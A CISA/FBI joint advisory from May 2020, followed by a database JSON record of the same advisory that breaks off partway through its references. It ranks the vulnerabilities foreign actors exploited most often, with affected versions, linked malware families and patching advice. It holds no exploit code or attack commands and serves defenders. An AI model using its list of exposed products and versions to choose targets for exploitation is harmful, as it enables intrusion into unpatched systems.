Top 10 Routinely Exploited Vulnerabilities

2020-05-12T12:00:00

Description

### Summary The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the broader U.S. Government are providing this technical guidance to advise IT security professionals at public and private sector organizations to place an increased priority on patching the most commonly known vulnerabilities exploited by sophisticated foreign cyber actors. This alert provides details on vulnerabilities routinely exploited by foreign cyber actors—primarily Common Vulnerabilities and Exposures (CVEs)[[1]](<https://cve.mitre.org/cve/ >)—to help organizations reduce the risk of these foreign threats. Foreign cyber actors continue to exploit publicly known—and often dated—software vulnerabilities against broad target sets, including public and private sector organizations. Exploitation of these vulnerabilities often requires fewer resources as compared with zero-day exploits for which no patches are available. The public and private sectors could degrade some foreign cyber threats to U.S. interests through an increased effort to patch their systems and implement programs to keep system patching up to date. A concerted campaign to patch these vulnerabilities would introduce friction into foreign adversaries’ operational tradecraft and force them to develop or acquire exploits that are more costly and less widely effective. A concerted patching campaign would also bolster network security by focusing scarce defensive resources on the observed activities of foreign adversaries. For indicators of compromise (IOCs) and additional guidance associated with the CVEs in this Alert, see the each entry within the Mitigations section below. Click here for a PDF version of this report. ### Technical Details ## Top 10 Most Exploited Vulnerabilities 2016–2019 U.S. Government reporting has identified the top 10 most exploited vulnerabilities by state, nonstate, and unattributed cyber actors from 2016 to 2019 as follows: CVE-2017-11882, CVE-2017-0199, CVE-2017-5638, CVE-2012-0158, CVE-2019-0604, CVE-2017-0143, CVE-2018-4878, CVE-2017-8759, CVE-2015-1641, and CVE-2018-7600. * According to U.S. Government technical analysis, malicious cyber actors most often exploited vulnerabilities in Microsoft’s Object Linking and Embedding (OLE) technology. OLE allows documents to contain embedded content from other applications such as spreadsheets. After OLE the second-most-reported vulnerable technology was a widespread Web framework known as Apache Struts. * Of the top 10, the three vulnerabilities used most frequently across state-sponsored cyber actors from China, Iran, North Korea, and Russia are CVE-2017-11882, CVE-2017-0199, and CVE-2012-0158. All three of these vulnerabilities are related to Microsoft’s OLE technology. * As of December 2019, Chinese state cyber actors were frequently exploiting the same vulnerability—CVE-2012-0158—that the U.S. Government publicly assessed in 2015 was the most used in their cyber operations.[[2]](<https://www.us-cert.gov/ncas/alerts/TA15-119A>) This trend suggests that organizations have not yet widely implemented patches for this vulnerability and that Chinese state cyber actors may continue to incorporate dated flaws into their operational tradecraft as long as they remain effective. * Deploying patches often requires IT security professionals to balance the need to mitigate vulnerabilities with the need for keeping systems running and ensuring installed patches are compatible with other software. This can require a significant investment of effort, particularly when mitigating multiple flaws at the same time. * A U.S. industry study released in early 2019 similarly discovered that the flaws malicious cyber actors exploited the most consistently were in Microsoft and Adobe Flash products, probably because of the widespread use of these technologies.[[3]](<https://www.recordedfuture.com/top-vulnerabilities-2019/>) Four of the industry study’s top 10 most exploited flaws also appear on this Alert’s list, highlighting how U.S. Government and private-sector data sources may complement each other to enhance security. ## Vulnerabilities Exploited in 2020 In addition to the top 10 vulnerabilities from 2016 to 2019 listed above, the U.S. Government has reported that the following vulnerabilities are being routinely exploited by sophisticated foreign cyber actors in 2020: * Malicious cyber actors are increasingly targeting unpatched Virtual Private Network vulnerabilities. * An arbitrary code execution vulnerability in Citrix VPN appliances, known as CVE-2019-19781, has been detected in exploits in the wild. * An arbitrary file reading vulnerability in Pulse Secure VPN servers, known as CVE-2019-11510, continues to be an attractive target for malicious actors. * March 2020 brought an abrupt shift to work-from-home that necessitated, for many organizations, rapid deployment of cloud collaboration services, such as Microsoft Office 365 (O365). Malicious cyber actors are targeting organizations whose hasty deployment of Microsoft O365 may have led to oversights in security configurations and vulnerable to attack. * Cybersecurity weaknesses—such as poor employee education on social engineering attacks and a lack of system recovery and contingency plans—have continued to make organizations susceptible to ransomware attacks in 2020. ### Mitigations This Alert provides mitigations for each of the top vulnerabilities identified above. In addition to the mitigations listed below, CISA, FBI, and the broader U.S. Government recommend that organizations transition away from any end-of-life software. ## Mitigations for the Top 10 Most Exploited Vulnerabilities 2016–2019 **Note:** The lists of associated malware corresponding to each CVE below is not meant to be exhaustive but instead is intended to identify a malware family commonly associated with exploiting the CVE. _**CVE-2017-11882**_ * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Products * Associated Malware: Loki, FormBook, Pony/FAREIT * Mitigation: Update affected Microsoft products with the latest security patches * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-11882> * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133e> _**CVE-2017-0199**_ * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1 * Associated Malware: FINSPY, LATENTBOT, Dridex * Mitigation: Update affected Microsoft products with the latest security patches * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-0199> * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133g>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133h>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133p> _**CVE-2017-5638**_ * Vulnerable Products: Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 * Associated Malware: JexBoss * Mitigation: Upgrade to Struts 2.3.32 or Struts 2.5.10.1 * More Detail: * <https://www.us-cert.gov/ncas/analysis-reports/AR18-312A> * <https://nvd.nist.gov/vuln/detail/CVE-2017-5638> _**CVE-2012-0158**_ * Vulnerable Products: Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 * Associated Malware: Dridex * Mitigation: Update affected Microsoft products with the latest security patches * More Detail: * <https://www.us-cert.gov/ncas/alerts/aa19-339a> * <https://nvd.nist.gov/vuln/detail/CVE-2012-0158> * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133i>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133j>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133k>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133l>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133n>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133o> _**CVE-2019-0604**_ * Vulnerable Products: Microsoft SharePoint * Associated Malware: China Chopper * Mitigation: Update affected Microsoft products with the latest security patches * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2019-0604> _**CVE-2017-0143**_ * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit * Mitigation: Update affected Microsoft products with the latest security patches * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-0143> _**CVE-2018-4878**_ * Vulnerable Products: Adobe Flash Player before 28.0.0.161 * Associated Malware: DOGCALL * Mitigation: Update Adobe Flash Player installation to the latest version * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2018-4878> * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133d> **_CVE-2017-8759_** * Vulnerable Products: Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 * Associated Malware: FINSPY, FinFisher, WingBird * Mitigation: Update affected Microsoft products with the latest security patches * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-8759> * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133f> _**CVE-2015-1641**_ * Vulnerable Products: Microsoft Word 2007 SP3, Office 2010 SP2, Word 2010 SP2, Word 2013 SP1, Word 2013 RT SP1, Word for Mac 2011, Office Compatibility Pack SP3, Word Automation Services on SharePoint Server 2010 SP2 and 2013 SP1, and Office Web Apps Server 2010 SP2 and 2013 SP1 * Associated Malware: Toshliph, UWarrior * Mitigation: Update affected Microsoft products with the latest security patches * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2015-1641> * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133m> _**CVE-2018-7600**_ * Vulnerable Products: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 * Associated Malware: Kitty * Mitigation: Upgrade to the most recent version of Drupal 7 or 8 core. * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2018-7600> ## Mitigations for Vulnerabilities Exploited in 2020 **_CVE-2019-11510_** * Vulnerable Products: Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15 and Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15 * Mitigation: Update affected Pulse Secure devices with the latest security patches. * More Detail: * <https://www.us-cert.gov/ncas/alerts/aa20-107a> * <https://nvd.nist.gov/vuln/detail/CVE-2019-11510> * <https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/> _**CVE-2019-19781**_ * Vulnerable Products: Citrix Application Delivery Controller, Citrix Gateway, and Citrix SDWAN WANOP * Mitigation: Update affected Citrix devices with the latest security patches * More Detail: * <https://www.us-cert.gov/ncas/alerts/aa20-020a> * <https://www.us-cert.gov/ncas/alerts/aa20-031a> * <https://www.fireeye.com/blog/products-and-services/2020/01/fireeye-and-citrix-tool-scans-for-iocs-related-to-vulnerability.html> * <https://nvd.nist.gov/vuln/detail/CVE-2019-19781> * <https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/> _**Oversights in Microsoft O365 Security Configurations**_ * Vulnerable Products: Microsoft O365 * Mitigation: Follow Microsoft O365 security recommendations * More Detail: <https://www.us-cert.gov/ncas/alerts/aa20-120a> **_Organizational Cybersecurity Weaknesses_** * Vulnerable Products: Systems, networks, and data * Mitigation: Follow cybersecurity best practices * More Detail: <https://www.cisa.gov/cyber-essentials> ## CISA’s Free Cybersecurity Services Adversaries use known vulnerabilities and phishing attacks to compromise the security of organizations. CISA offers several free scanning and testing services to help organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. **Cyber Hygiene: Vulnerability Scanning** helps secure your internet-facing systems from weak configuration and known vulnerabilities. It also encourages organizations to adopt modern security best practices. CISA performs regular network and vulnerability scans and delivers a weekly report for your action. Once initiated, this service is mostly automated and requires little direct interaction. After CISA receives the required paperwork for Cyber Hygiene, our scans will start within 72 hours and you’ll begin receiving reports within two weeks. **Web Application Service** checks your publicly accessible web sites for potential bugs and weak configurations. It provides a “snapshot” of your publicly accessible web applications and also checks functionality and performance in your application. If your organization would like these services or want more information about other useful services, please email [vulnerability_info@cisa.dhs.gov](<mailto:vulnerability_info@cisa.dhs.gov>). ## CISA Online Resources The Patch Factory: CISA infographic depicting the global infrastructure for managing vulnerabilities. [CISA Alert: (AA20-120A) Microsoft Office 365 Security Recommendations](<https://www.us-cert.gov/ncas/alerts/aa20-120a>): recommendations for organizations to review and ensure their O365 environment is configured to protect, detect, and respond against would-be attackers. [CISA’s Cyber Essentials](<https://www.cisa.gov/cyber-essentials>): a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices. ### Contact Information If you have any further questions related to this Joint Alert, please contact the FBI at either your local Cyber Task Force or FBI CyWatch. * You can find your local field offices at <https://www.fbi.gov/contact-us/field> * CyWatch can be contacted through e-mail at [cywatch@fbi.gov](<mailto:cywatch@fbi.gov>) or by phone at 1-855-292-3937 To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov> "Email CISA Central" ). ### References [[1] Cybersecurity Vulnerabilities and Exposures (CVE) list](<https://cve.mitre.org/cve/>) [[2] CISA Alert (TA15-119A). Top 30 Targeted High Risk Vulnerabilities. (2016, September 29)](<https://www.us-cert.gov/ncas/alerts/TA15-119A>) [[3] Recorded Future. 2019 Vulnerability Report: Cybercriminals Continue to Target Microsoft Products. (2020, February 4)](<https://www.recordedfuture.com/top-vulnerabilities-2019/>) ### Revisions May 12, 2020: Initial Version

{"id": "AA20-133A", "vendorId": null, "type": "ics", "bulletinFamily": "info", "title": "Top 10 Routinely Exploited Vulnerabilities", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the broader U.S. Government are providing this technical guidance to advise IT security professionals at public and private sector organizations to place an increased priority on patching the most commonly known vulnerabilities exploited by sophisticated foreign cyber actors.\n\nThis alert provides details on vulnerabilities routinely exploited by foreign cyber actors\u2014primarily Common Vulnerabilities and Exposures (CVEs)[[1]](<https://cve.mitre.org/cve/ >)\u2014to help organizations reduce the risk of these foreign threats.\n\nForeign cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations. Exploitation of these vulnerabilities often requires fewer resources as compared with zero-day exploits for which no patches are available.\n\nThe public and private sectors could degrade some foreign cyber threats to U.S. interests through an increased effort to patch their systems and implement programs to keep system patching up to date. A concerted campaign to patch these vulnerabilities would introduce friction into foreign adversaries\u2019 operational tradecraft and force them to develop or acquire exploits that are more costly and less widely effective. A concerted patching campaign would also bolster network security by focusing scarce defensive resources on the observed activities of foreign adversaries.\n\nFor indicators of compromise (IOCs) and additional guidance associated with the CVEs in this Alert, see the each entry within the Mitigations section below. Click here for a PDF version of this report.\n\n### Technical Details\n\n## Top 10 Most Exploited Vulnerabilities 2016\u20132019\n\nU.S. Government reporting has identified the top 10 most exploited vulnerabilities by state, nonstate, and unattributed cyber actors from 2016 to 2019 as follows: CVE-2017-11882, CVE-2017-0199, CVE-2017-5638, CVE-2012-0158, CVE-2019-0604, CVE-2017-0143, CVE-2018-4878, CVE-2017-8759, CVE-2015-1641, and CVE-2018-7600.\n\n * According to U.S. Government technical analysis, malicious cyber actors most often exploited vulnerabilities in Microsoft\u2019s Object Linking and Embedding (OLE) technology. OLE allows documents to contain embedded content from other applications such as spreadsheets. After OLE the second-most-reported vulnerable technology was a widespread Web framework known as Apache Struts.\n * Of the top 10, the three vulnerabilities used most frequently across state-sponsored cyber actors from China, Iran, North Korea, and Russia are CVE-2017-11882, CVE-2017-0199, and CVE-2012-0158. All three of these vulnerabilities are related to Microsoft\u2019s OLE technology.\n * As of December 2019, Chinese state cyber actors were frequently exploiting the same vulnerability\u2014CVE-2012-0158\u2014that the U.S. Government publicly assessed in 2015 was the most used in their cyber operations.[[2]](<https://www.us-cert.gov/ncas/alerts/TA15-119A>) This trend suggests that organizations have not yet widely implemented patches for this vulnerability and that Chinese state cyber actors may continue to incorporate dated flaws into their operational tradecraft as long as they remain effective.\n * Deploying patches often requires IT security professionals to balance the need to mitigate vulnerabilities with the need for keeping systems running and ensuring installed patches are compatible with other software. This can require a significant investment of effort, particularly when mitigating multiple flaws at the same time.\n * A U.S. industry study released in early 2019 similarly discovered that the flaws malicious cyber actors exploited the most consistently were in Microsoft and Adobe Flash products, probably because of the widespread use of these technologies.[[3]](<https://www.recordedfuture.com/top-vulnerabilities-2019/>) Four of the industry study\u2019s top 10 most exploited flaws also appear on this Alert\u2019s list, highlighting how U.S. Government and private-sector data sources may complement each other to enhance security.\n\n## Vulnerabilities Exploited in 2020\n\nIn addition to the top 10 vulnerabilities from 2016 to 2019 listed above, the U.S. Government has reported that the following vulnerabilities are being routinely exploited by sophisticated foreign cyber actors in 2020:\n\n * Malicious cyber actors are increasingly targeting unpatched Virtual Private Network vulnerabilities. \n * An arbitrary code execution vulnerability in Citrix VPN appliances, known as CVE-2019-19781, has been detected in exploits in the wild.\n * An arbitrary file reading vulnerability in Pulse Secure VPN servers, known as CVE-2019-11510, continues to be an attractive target for malicious actors.\n * March 2020 brought an abrupt shift to work-from-home that necessitated, for many organizations, rapid deployment of cloud collaboration services, such as Microsoft Office 365 (O365). Malicious cyber actors are targeting organizations whose hasty deployment of Microsoft O365 may have led to oversights in security configurations and vulnerable to attack.\n * Cybersecurity weaknesses\u2014such as poor employee education on social engineering attacks and a lack of system recovery and contingency plans\u2014have continued to make organizations susceptible to ransomware attacks in 2020.\n\n### Mitigations\n\nThis Alert provides mitigations for each of the top vulnerabilities identified above. In addition to the mitigations listed below, CISA, FBI, and the broader U.S. Government recommend that organizations transition away from any end-of-life software.\n\n## Mitigations for the Top 10 Most Exploited Vulnerabilities 2016\u20132019\n\n**Note:** The lists of associated malware corresponding to each CVE below is not meant to be exhaustive but instead is intended to identify a malware family commonly associated with exploiting the CVE. \n\n_**CVE-2017-11882**_\n\n * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Products\n * Associated Malware: Loki, FormBook, Pony/FAREIT\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-11882>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133e>\n\n_**CVE-2017-0199**_\n\n * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1\n * Associated Malware: FINSPY, LATENTBOT, Dridex\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-0199>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133g>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133h>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133p>\n\n_**CVE-2017-5638**_\n\n * Vulnerable Products: Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1\n * Associated Malware: JexBoss\n * Mitigation: Upgrade to Struts 2.3.32 or Struts 2.5.10.1\n * More Detail: \n * <https://www.us-cert.gov/ncas/analysis-reports/AR18-312A>\n * <https://nvd.nist.gov/vuln/detail/CVE-2017-5638>\n\n_**CVE-2012-0158**_\n\n * Vulnerable Products: Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0\n * Associated Malware: Dridex\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: \n * <https://www.us-cert.gov/ncas/alerts/aa19-339a>\n * <https://nvd.nist.gov/vuln/detail/CVE-2012-0158>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133i>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133j>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133k>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133l>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133n>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133o>\n\n_**CVE-2019-0604**_\n\n * Vulnerable Products: Microsoft SharePoint\n * Associated Malware: China Chopper\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2019-0604>\n\n_**CVE-2017-0143**_\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-0143>\n\n_**CVE-2018-4878**_\n\n * Vulnerable Products: Adobe Flash Player before 28.0.0.161\n * Associated Malware: DOGCALL\n * Mitigation: Update Adobe Flash Player installation to the latest version\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2018-4878>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133d>\n\n**_CVE-2017-8759_**\n\n * Vulnerable Products: Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7\n * Associated Malware: FINSPY, FinFisher, WingBird\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-8759>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133f>\n\n_**CVE-2015-1641**_\n\n * Vulnerable Products: Microsoft Word 2007 SP3, Office 2010 SP2, Word 2010 SP2, Word 2013 SP1, Word 2013 RT SP1, Word for Mac 2011, Office Compatibility Pack SP3, Word Automation Services on SharePoint Server 2010 SP2 and 2013 SP1, and Office Web Apps Server 2010 SP2 and 2013 SP1\n * Associated Malware: Toshliph, UWarrior\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2015-1641>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133m>\n\n_**CVE-2018-7600**_\n\n * Vulnerable Products: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1\n * Associated Malware: Kitty\n * Mitigation: Upgrade to the most recent version of Drupal 7 or 8 core.\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2018-7600>\n\n## Mitigations for Vulnerabilities Exploited in 2020\n\n**_CVE-2019-11510_**\n\n * Vulnerable Products: Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15 and Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n * Mitigation: Update affected Pulse Secure devices with the latest security patches.\n * More Detail: \n * <https://www.us-cert.gov/ncas/alerts/aa20-107a>\n * <https://nvd.nist.gov/vuln/detail/CVE-2019-11510>\n * <https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>\n\n_**CVE-2019-19781**_\n\n * Vulnerable Products: Citrix Application Delivery Controller, Citrix Gateway, and Citrix SDWAN WANOP\n * Mitigation: Update affected Citrix devices with the latest security patches\n * More Detail: \n * <https://www.us-cert.gov/ncas/alerts/aa20-020a>\n * <https://www.us-cert.gov/ncas/alerts/aa20-031a>\n * <https://www.fireeye.com/blog/products-and-services/2020/01/fireeye-and-citrix-tool-scans-for-iocs-related-to-vulnerability.html>\n * <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>\n * <https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>\n\n_**Oversights in Microsoft O365 Security Configurations**_\n\n * Vulnerable Products: Microsoft O365\n * Mitigation: Follow Microsoft O365 security recommendations\n * More Detail: <https://www.us-cert.gov/ncas/alerts/aa20-120a>\n\n**_Organizational Cybersecurity Weaknesses_**\n\n * Vulnerable Products: Systems, networks, and data\n * Mitigation: Follow cybersecurity best practices\n * More Detail: <https://www.cisa.gov/cyber-essentials>\n\n## CISA\u2019s Free Cybersecurity Services\n\nAdversaries use known vulnerabilities and phishing attacks to compromise the security of organizations. CISA offers several free scanning and testing services to help organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors.\n\n**Cyber Hygiene: Vulnerability Scanning** helps secure your internet-facing systems from weak configuration and known vulnerabilities. It also encourages organizations to adopt modern security best practices. CISA performs regular network and vulnerability scans and delivers a weekly report for your action. Once initiated, this service is mostly automated and requires little direct interaction. After CISA receives the required paperwork for Cyber Hygiene, our scans will start within 72 hours and you\u2019ll begin receiving reports within two weeks.\n\n**Web Application Service** checks your publicly accessible web sites for potential bugs and weak configurations. It provides a \u201csnapshot\u201d of your publicly accessible web applications and also checks functionality and performance in your application. \nIf your organization would like these services or want more information about other useful services, please email [vulnerability_info@cisa.dhs.gov](<mailto:vulnerability_info@cisa.dhs.gov>).\n\n## CISA Online Resources\n\nThe Patch Factory: CISA infographic depicting the global infrastructure for managing vulnerabilities.\n\n[CISA Alert: (AA20-120A) Microsoft Office 365 Security Recommendations](<https://www.us-cert.gov/ncas/alerts/aa20-120a>): recommendations for organizations to review and ensure their O365 environment is configured to protect, detect, and respond against would-be attackers.\n\n[CISA\u2019s Cyber Essentials](<https://www.cisa.gov/cyber-essentials>): a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices.\n\n### Contact Information\n\nIf you have any further questions related to this Joint Alert, please contact the FBI at either your local Cyber Task Force or FBI CyWatch.\n\n * You can find your local field offices at <https://www.fbi.gov/contact-us/field>\n * CyWatch can be contacted through e-mail at [cywatch@fbi.gov](<mailto:cywatch@fbi.gov>) or by phone at 1-855-292-3937\n\nTo request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov> \"Email CISA Central\" ).\n\n### References\n\n[[1] Cybersecurity Vulnerabilities and Exposures (CVE) list](<https://cve.mitre.org/cve/>)\n\n[[2] CISA Alert (TA15-119A). Top 30 Targeted High Risk Vulnerabilities. (2016, September 29)](<https://www.us-cert.gov/ncas/alerts/TA15-119A>)\n\n[[3] Recorded Future. 2019 Vulnerability Report: Cybercriminals Continue to Target Microsoft Products. (2020, February 4)](<https://www.recordedfuture.com/top-vulnerabilities-2019/>)\n\n### Revisions\n\nMay 12, 2020: Initial Version\n", "published": "2020-05-12T12:00:00", "modified": "2020-05-12T12:00:00", "epss": [{"cve": "CVE-2012-0158", "epss": 0.97286, "percentile": 0.99787, "modified": "2023-09-21"}, {"cve": "CVE-2015-1641", "epss": 0.96953, "percentile": 0.99618, "modified": "2023-09-21"}, {"cve": "CVE-2017-0143", "epss": 0.97334, "percentile": 0.99821, "modified": "2023-09-21"}, {"cve": "CVE-2017-0199", "epss": 0.97445, "percentile": 0.99917, "modified": "2023-09-21"}, {"cve": "CVE-2017-11882", "epss": 0.97464, "percentile": 0.99933, "modified": "2023-09-20"}, {"cve": "CVE-2017-5638", "epss": 0.97552, "percentile": 0.99992, "modified": "2023-06-23"}, {"cve": "CVE-2017-8759", "epss": 0.97451, "percentile": 0.99914, "modified": "2023-06-05"}, {"cve": "CVE-2018-4878", "epss": 0.97275, "percentile": 0.99761, "modified": "2023-06-23"}, {"cve": "CVE-2018-7600", "epss": 0.97576, "percentile": 1.0, "modified": "2023-06-23"}, {"cve": "CVE-2019-0604", "epss": 0.97448, "percentile": 0.99913, "modified": "2023-06-13"}, {"cve": "CVE-2019-11510", "epss": 0.97334, "percentile": 0.99806, "modified": "2023-06-13"}, {"cve": "CVE-2019-19781", "epss": 0.97475, "percentile": 0.99939, "modified": "2023-06-13"}, {"cve": "CVE-2022-42475", "epss": 0.42232, "percentile": 0.96784, "modified": "2023-06-03"}, {"cve": "CVE-2022-47966", "epss": 0.97445, "percentile": 0.99916, "modified": "2023-09-19"}], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-133a", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://www.facebook.com/sharer/sharer.php?u=https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-133a&title=Top%2010%20Routinely%20Exploited%20Vulnerabilities", "https://twitter.com/intent/tweet?text=Top%2010%20Routinely%20Exploited%20Vulnerabilities+https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-133a", "https://www.linkedin.com/sharing/share-offsite/?url=https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-133a", "mailto:?subject=Top%2010%20Routinely%20Exploited%20Vulnerabilities&body=https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-133a", "https://cve.mitre.org/cve/ ", "https://www.us-cert.gov/ncas/alerts/TA15-119A", "https://www.recordedfuture.com/top-vulnerabilities-2019/", "https://nvd.nist.gov/vuln/detail/CVE-2017-11882", "https://www.us-cert.gov/ncas/analysis-reports/ar20-133e", "https://nvd.nist.gov/vuln/detail/CVE-2017-0199", "https://www.us-cert.gov/ncas/analysis-reports/ar20-133g", "https://www.us-cert.gov/ncas/analysis-reports/ar20-133h", "https://www.us-cert.gov/ncas/analysis-reports/ar20-133p", "https://www.us-cert.gov/ncas/analysis-reports/AR18-312A", "https://nvd.nist.gov/vuln/detail/CVE-2017-5638", 